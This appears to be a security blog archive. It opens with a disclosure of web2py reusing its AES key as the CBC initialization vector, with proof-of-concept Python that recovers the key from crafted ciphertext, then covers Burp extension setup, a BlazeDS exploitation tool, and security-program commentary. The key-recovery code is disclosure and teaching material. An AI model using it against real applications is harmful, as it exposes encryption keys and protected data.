It's not uncommon for developers to accidentally (or purposefully) commit
passwords or other information supposed to remain secret into revision
control. It's also not uncommon to see RSA private keys indexed by Google,
and GitHub made it even easier to find secrets in the code with their new
search features. These same search features make it easy to grep the web
for all kinds of insecure code patterns, especially insecure cryptographic
constructions. For example, a simple search for AES.new( in Python code
repositories revealed to me the web2py project was using the encryption key
as the initialization vector (IV), which is the focus of this blog post.
Why is this bad? Well, in an email to the sci.crypt mailing list back
in 1996, David Wagner explains why you should never do this.
Let's take a look at the insecure construction in web2py's gluon.utils
module prior to merging my pull request that fixed this issue.
from Crypto.Cipher import AES
AES_new = lambda key: AES.new(key, AES.MODE_CBC, IV=key[:16])
From an attacker's perspective (in short), if we can control the ciphertext
being fed to this function, and see the output of this function (the decrypted)
text, we can easily deduce the key used to perform the encryption. The
following code demonstrates this:
KEY = 'testtesttesttest'
PTEXT = 'The quick brown fox jumped over the lazy dog.The quick brown fox'
def xor(a, b):
return bytearray(x ^ y for x, y in zip(a, b))
# ciphertext produced by web2py
ctext = bytearray(AES_new(KEY).encrypt(PTEXT))
# our (malformed) ciphertext we plan to feed to web2py
mtext = ctext[:16] * 4
mtext[16:32] = [0x0] * 16
# if at any point we identify what the decrypted data is
ptext = bytearray(AES_new(KEY).decrypt(str(mtext)))
# we can easily recover the secret key used:
print('KEY: %r' % (str(xor(ptext[:16], ptext[32:48])), ))
Running this exploit returns the following (I've included hexdumps at each
step of the way):
0x00: b9 56 1d c6 0a 62 2f 09 f8 cb 49 f4 7a 30 71 9a .V...b....I.z0q.
0x10: 19 ef 66 aa 2e a6 f7 77 2a 15 e8 1b 72 28 30 fb ..f....w....r.0.
0x20: ea 38 af 2c 1f db bf 63 40 e9 70 75 92 aa df d4 .8.....c..pu....
0x30: ce 57 b9 82 59 7e b1 e9 3c c3 11 f2 5e a7 3b 5d .W..Y...........
0x00: b9 56 1d c6 0a 62 2f 09 f8 cb 49 f4 7a 30 71 9a .V...b....I.z0q.
0x10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x20: b9 56 1d c6 0a 62 2f 09 f8 cb 49 f4 7a 30 71 9a .V...b....I.z0q.
0x30: b9 56 1d c6 0a 62 2f 09 f8 cb 49 f4 7a 30 71 9a .V...b....I.z0q.
0x00: 54 68 65 20 71 75 69 63 6b 20 62 72 6f 77 6e 20 The.quick.brown.
0x10: 52 0b 27 65 2b e2 f4 a1 c9 78 b5 7c 09 67 a3 4c R..e.....x...g.L
0x20: 20 0d 16 54 05 10 1a 17 1f 45 11 06 1b 12 1d 54 ...T.....E.....T
0x30: 99 5b 0b 92 0f 72 35 1e e7 8e 58 f2 61 22 6c ce .....r5...X.a.l.
Is web2py vulnerable?
In short, no. The manner in which AES_new was used across web2py's
codebase did not appear to be exploitable. web2py was using this to encrypt
pickled session data in a cookie in secure_dumps, and authenticated with
an HMAC (which coincidentally was also vulnerable to a timing attack).
However, applications that use AES_new as a convenience function for
decrypting data provided by the user are most likely vulnerable, amongst
other vulnerabilities that tend to crop up when rolling your own crypto.
If you've been keeping up with web2py's master, my merged pull request
patches the AES_new function to return a random IV anytime it is invoked
and utilizes the more secure, constant-time compare function to validate
Last year, I released the Jython Burp API,
a plugin framework to Burp that allows running multiple plugins simultaneously,
exposes an interactive Jython console, provides Filter-like
functionality, and eases developing plugins at runtime by providing more
Pythonic APIs and automatic code reloading for when code or configurations
are updated. I presented an overview of my framework at an iSec Partners Forum
in NYC last year. Others have released similar frameworks that also provide the
ability to write Burp extensions in Jython.
Since then, PortSwigger released a new Burp Extender API, allowing users
to develop all sorts of plugins and extend Burp's various tools in a myriad
of ways. Regardless, I still find my framework and others like Buby still
have their place. I'd like to take the next few paragraphs to guide users
on setting up the Jython Burp API in their environment.
First, we'll need to get the latest 2.7+ standalone version of Jython.
At the time of this writing, the latest version is Jython 2.7beta1.
Once you download Jython, configure Burp's Python Environment.
Loading the Jython Burp API
If you haven't already done so, download the Jython Burp API. Then, all
you need to do (provided you're running Burp 1.5.04 or later), is add
jython-burp-api/Lib/burp_extender.py as a Python extension to Burp:
After you've clicked next, you should see the extension among the list of other
currently loaded extensions (if any).
An additional feature you may find useful is an interactive Jython console
tab, that allows you to interact with the Burp Extender object and any other
variables in the local namespace. I find it useful to iterate over requests in
Burp's Proxy History, collecting various information or highlighting/commenting
requests that may contain a specific header or string in the response body.
I added a right-click context menu item so you could select specific requests
and send them to the items variable, accessible from the console.
In a future blog post, I may dive into using some of the other features of
the framework. In the mean time, please feel free to fork and contribute to
the Jython Burp API!
I've posted an entry over on my employer's blog on Penetrating
Intranets through Adobe Flex
I've also released a new tool along with it, called Blazentoo. This tool
exploits insecurely configured BlazeDS Proxy Services, potentially
allowing you to browse internal web sites. You can download Blazentoo
from GDS' tools page.
Also, be sure to check out my other post from a while back, Pentesting
Adobe Flex Applications with a Custom AMF
This post goes into how to write a client using Python to make remoting
calls with a remote Flex server.
In my most recent post, I identified the direction and state-of-the-art
in application security. We all know of the importance of application
security in today's environments. However, finding out where to fit
application security policies and programs into an overall security
program (or organizational security plan) is as difficult (or more
difficult) than integrating mandatory regulations, compliance standards,
secure enterprise architectures, and many other risk management
Building a continually improving security program is an important and
common topic. For many CISOs and other directors of security programs --
this has been their day job since they earned their titles. There still
exists huge gaps between IT/Operations, Application Development, and
Information Security Management organizations and how they work
together. There are gaps in communication between departments, and even
within departments. The challenges of finding and retaining talent are
not unique only to appsec, as suggested in my last post.
I've only spoken about building a security
once before on this blog, but it's a popular conversation making the
rounds. securitymetrics.org (the blog,
mailing-list, Metricon conferences, and book) resurfaced a lot of my
interest, as well as the work that Mike
Rothman did with the Pragmatic
CSO, Michael Santarchangelo with his book
and the SecurityCatalyst
blog/podcast/forums, and numerous
Not all security programs and bloggers have picked up on these
resources. Take Creating a Solid Security
from Accuvant's new blog called Insight
from Kirk Greene. He appears to be familiar with some of the above
resources, but I think there is a lot more out there. After you read my
comment (which never got "approved"), be sure to check out the new
material I've been reading on the state-of-art in information security
management, especially including the human element.
Comment gone wrong #2
I think what you wrote here is a great example of a vulnerability
management program, but not a security program. Even then, it's actually
more operational (like a compliance initiative) because it gives little
strategic or tactical advice.
Starting with awareness is probably the worst way to build a
vulnerability management or security program. Maybe we just disagree,
but I'd like to see some evidence or metrics demonstrating that this
technique has any value, if you can point me to the literature.
Capital planning based on current or mock Strategy Maps and
Scorecards/Dashboards is really the first step for building a security
program. It is often best to first work with risk management (an
operational activity) that can feed metrics up to the strategy, although
this should be done along with compliance, regulatory requirements, and
potential liability factors. Risk assessments, especially ones done with
data classifications, can be the tactical metrics to pull into a risk
management report. Simple risk assessments can be done using business
tools such as 5 Forces, PESTEL, and/or SWOT anlaysis -- although in
security we have various others including FAIR, FMEA, and PRA.
I also like the concept of drilling down another strategic metric
platform via Enterprise Architecture, in particular an Enterprise
Architecture Blueprint (such as the one from Gunnar Peterson).
Enterprise Architecture can bring metrics down to the operational level
with security policy and certification standards. These can be turned
into server and application hardening standards at the tactical level.
Finally, asset/inventory management is another strategic activity that
can be conducted to build a proper security program. When combined with
the risk analysis data, asset management will provide guidance on where
to scan & patch, pen-test, and perform exploit development activities at
the tactical level. These tactical procedures can then provide more
metrics up to risk management, and back again up to more strategic
On second or further iteration, a balanced scorecard can easily be
created to include compliance metrics (operational) along with a
strategic direction (suggested as a strategy map). The balanced
scorecard could then include metrics from incident management, which in
turn could feed back into risk management and liability factors. SABSA
could be used to build a governance program to keep the capital planning
and security program alive and running with the rest of the business.
Additional qualitative metrics based on organizational development and
organizational behavior could be included in a hybrid platform such as
business scorecards very easily, including Six Sigma metrics such as
Voice of the Customer, et al. Simple, isn't it?
Your notion of using Application Security Scanners in a vulnerability
management program disturbs me -- especially in the way you have
suggested it. Maybe you're not familiar with these tools or how an
application assessment is best performed to today's standards.
First of all, the surface coverage for even the best app scanners is
94%, with many getting less than 1% surface coverage. Even IBM/Rational
AppScan was only showing 74% surface coverage using modern link
extraction application drivers.
Secondly, the false negative rate of app scanners is approaching 92%,
often more. The false positive rate varies between tools, testers and
apps, but I've seen figures as high as 40%. App scanners must be
properly configured and utilized by an expert in order to be effective
at all. Even then, black-box app scanners need to be combined with
static analysis and manual expert review for a significant majority of
applications falling under "most-risky" data classifications such as PII
(PCI-DSS, HIPAA, state performance auditing, etc) or financial data
(SOX, GLB, et al). Even middle-of-the-road risky data classifications
(e.g. proprietary information that has yet to be patented) should
probably have more done to them than a simple black-box app scanner.
When I say manual review + static analysis, I really mean it. The
automated tools pay for themselves by the amount of time saved -- but
can never be used alone. Security review tools that implement static
analysis techniques, such as Fortify, Ounce, Checkmarx, Parasoft,
Grammatech, DevInspect, AppScan DE, Coverity, Klocwork, and SciTools
have better false negative rates than black-box scanners, but much worse
false positive error rates. FN is usually between 65-85% (the tool FAILS
to find vulnerabilities this often); FP is 85-99%, you'll often see more
"vulnerabilities found" than lines of code averaged across apps. This is
why manual expert review with full-knowledge remains the best
application assessment technique.
I don't mean to harsh on you too hard, but it does appear that you need
to do more homework before making prescriptions for building a security
program -- let alone a vulnerability management program. You seem to be
capable of providing this information accurately (based on your last
blog post and the great blogroll you've setup so far), so I expect
better out of future blog posts.
Aftermath and reasoning
The consulting companies that I work with (and other colleagues, often
consultants from other consulting companies that have been on the same
or similar engagements with me) have all taken a strong interest in
building trusted advisory adjuncts to the "too busy IT manager" or
Mascot CISO/CSO. We have to in order to remain relevant and respected.
However, I've always viewed consultants as "the colostomy bag of a very
ill organization". Fix the organization and the technology advancements
(or whatever else is needed) become agile and sustainable.
Rafal Los recently had me on his 31337 Spotlight: Andre
for his Digital Soapbox blog.
BTW - Thanks Rafal -- hope you and nearly everyone else are having fun
in Vegas right now! There are a few links which may have got lost in my
nonsensical chatter, so I wanted to specifically point them out. I said:
I like the idea that I can use my hacking skills for good and cause
organizational change through discovery of `organizational
A real "hack" to me is to take a `disfunctional
organization <http://blogs.bnet.com/ceo/?p=1462>`_ and turn it into
There are very few state-of-the-art resources on organizational theory
combined with information security management. Allow me to point you to
the few that I'm familiar with and highly recommend. After you check
them out, you may find yourself coming to similar or related conclusions
as I did with the above comment.
- David Lacey, author of Managing the Human Factor in Information
Security: How to Win over Staff and Influence Business
- Krag Brotby, author of Information Security Metrics: A Definitive
Guide to Effective Security Monitoring and
Measurement and Information
- Ron Person, author of Balanced Scorecards & Operational Dashboards
With Microsoft Excel -- one of many
books on Balanced Scorecards, but very recently written and caught my
- Ian Gorrie, blogger of Bad Penny, with posts such as the most recent
The Trials of
Toorcamp where he
kindly provided the slides to his talk entitled "Hacking HR". He has
even posted earlier on information security management (or as he
calls it security information
management, an interesting but perhaps
confusing twist there). My favorite was a presentation he did at
ITCi 2007 that is a must
- Kevin Nassery, (@knassery, who spoke
at LayerOne 2009 on Diplomatic Security
I have at least one more of these "comments gone X" posts, but the next
ones should both begin and end on more positive notes. If you have any
suggestions of comments you've seen from me that you would like to see
turned into a blog post, let me know!